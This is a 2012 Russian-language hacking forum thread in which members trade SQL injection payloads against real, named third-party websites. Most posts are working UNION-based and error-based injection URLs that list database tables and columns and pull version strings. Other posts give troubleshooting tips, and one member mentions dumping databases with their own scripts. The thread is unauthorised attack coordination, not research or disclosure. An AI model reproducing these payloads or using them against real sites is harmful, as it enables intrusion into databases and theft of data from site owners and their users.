Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    Можешь использовать как блинд.
     
    _________________________
  2. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    http://venec.ulstu.ru/lib/go.php?id=2151-9999999.9+union+select+1,2,3,4,5,6,7,8,9,12313212,11,12,13,14,15,16,17,18,19,20,21,22--+
    Только не вывел ничего(
     
    #19922 Ereee, 24 Mar 2012
    Last edited: 24 Mar 2012
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    блин,
    а тут http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404+limit+0,0+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables--+

    чего таблици не выводит?
     
  4. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404-9999.9+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables+limit+0,1--+d

    Конечно, limit 0,0 сделал.
     
    1 person likes this.
  5. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591
    http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,14,15,16,17,18,19,20,21,22--


    не?
     
    _________________________
    3 people like this.
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    ну ты и мозг)))
    а тут

    http://www.fanfics.ru/read.php?id=3&chapter=-616'

    ошибка есть, что не подставлю она пропадает, как быть?
     
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591

    какой там вывод? или я в шары долблюсь?
     
    _________________________
    2 people like this.
  8. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    140
    Likes Received:
    40
    Reputations:
    26
    норм. вывод '5.1.45'
     
    1 person likes this.
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    чёт непойму где ты там вывод нашол? у меня как небыло так и нету
     
  10. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    616
    Likes Received:
    203
    Reputations:
    293
    Пробелы постирайте))

     
    2 people like this.
  11. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,581
    Likes Received:
    425
    Reputations:
    231
    [​IMG]
     
    1 person likes this.
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Потому что скуля там не в GET-параметре, а в URI:

    http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1

    Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11

    А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
     
    3 people like this.
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?

    и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет

    http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+

    как их вывести?
     
  14. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    520
    Likes Received:
    105
    Reputations:
    53
    http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+

    Читая твои вопросы, в 70% у тебя проблема в себе самом и в том, что ты не пытаешься сам решить проблему. Если хочешь чему-то научиться, сначала пробуй разобраться.
     
    #19934 Melfis, 24 Mar 2012
    Last edited: 24 Mar 2012
    1 person likes this.
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Все выводиться, WHERE убери =\
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,444
    Likes Received:
    762
    Reputations:
    834
    После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+
     
    _________________________
  17. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    А на мой вопрос кто нибудь ответит?
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    для кого это тема?

    там море ссылок
     
    _________________________
  19. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    http://site.com/about.php?page='

    Is that sql vuln ?

    Well, for now I don't want to post link over the internet, but can you help me a little to find the tables ? I tried so many of ways but can't get working method...

    My tries:
    Code:
    http://site.com/about.php?page=')+order+by+13--+-
    http://site.com/about.php?page='+order+by+13--+-
    http://site.com/about.php?page=' order by 13
    But there is no change...
    Any ideas ?

    BTW I'm sorry about the language, but if I use google translate, would be awful for all of us...
     
    1 person likes this.
  20. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Yes, this is sql-injection, but in LIMIT. You can't exploit this vuln.
     
Loading...
Thread Status:
Not open for further replies.